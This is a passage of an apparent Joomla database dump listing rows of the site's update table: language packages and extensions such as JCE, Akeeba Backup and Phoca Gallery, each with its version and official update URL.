Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(32363,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(32364,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(32365,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(32366,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(32367,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(32368,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.7.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(32369,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(32370,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(32371,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(32372,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(32373,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(32374,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(32375,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(32376,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(32377,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(32378,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(32379,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(32380,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(32381,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(32382,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(32384,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.0.3','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-0-3			\n		',''),(32385,129,0,'JCE 2.9.22','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.22','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-22-released',''),(32386,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.7','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(32387,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(32388,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32389,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32390,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32391,1,0,'Joomla','','joomla','file','',0,'3.10.8','','https://update.joomla.org/core/extension.xml','',''),(32392,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32393,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32394,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32395,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32396,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32397,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32398,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32399,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32400,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32401,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32402,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32403,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32404,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32405,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32406,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32407,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32408,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32409,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32410,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32411,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32412,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32413,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32414,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32415,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32416,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32417,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32418,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32419,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32420,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32421,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32422,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32423,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32424,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32425,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32426,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32427,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32428,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32429,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32430,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32431,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32432,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32433,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32434,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32435,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32436,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32437,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32438,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32439,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32440,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32441,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32442,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32443,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32444,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32445,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32446,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32447,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32448,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32449,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-4.html',''),(32450,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32451,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32452,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32453,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32454,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.5','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-5.html',''),(32455,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32456,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32457,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32458,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.5','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-5.html',''),(32459,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32460,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32461,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32462,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.5','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-5.html',''),(32463,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32464,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32465,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32466,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32467,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.5','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-5.html',''),(32468,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32469,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.5','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-5.html',''),(32470,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32471,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32472,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32473,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32474,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32475,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.5','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-5.html',''),(32476,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32477,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32478,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32479,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.5','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-5.html',''),(32480,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32481,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32482,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32483,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-6.html',''),(32484,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32485,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32486,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32487,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32488,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-6.html',''),(32489,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32490,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32491,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32492,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32493,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32494,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32495,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-6.html',''),(32496,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32497,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32498,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-6.html',''),(32499,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32500,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32501,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32502,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32503,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32504,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32505,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-6.html',''),(32506,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32507,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32508,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32509,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32510,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-6.html',''),(32511,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32512,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32513,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32514,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32515,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32516,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-6.html',''),(32517,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32518,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32519,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32520,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32521,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32522,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-6.html',''),(32523,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32524,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32525,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32526,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32527,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-7.html',''),(32528,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32529,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32530,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-7.html',''),(32531,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32532,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32533,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32534,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32535,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-7.html',''),(32536,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32537,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32538,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32539,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-7.html',''),(32540,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32541,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32542,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32543,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32544,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(32545,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(32546,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(32547,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(32548,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(32549,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(32550,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(32551,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(32552,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(32553,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(32554,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(32555,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(32556,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(32557,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(32558,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(32559,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(32560,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(32561,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(32562,3,0,'French','','pkg_fr-FR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(32563,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(32564,3,0,'German','','pkg_de-DE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(32565,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(32566,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(32567,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(32568,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(32569,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(32570,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(32571,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(32572,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(32573,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(32574,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(32575,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(32576,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(32577,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(32578,3,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(32579,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(32580,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(32581,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(32582,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(32583,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(32584,3,0,'Serbian, 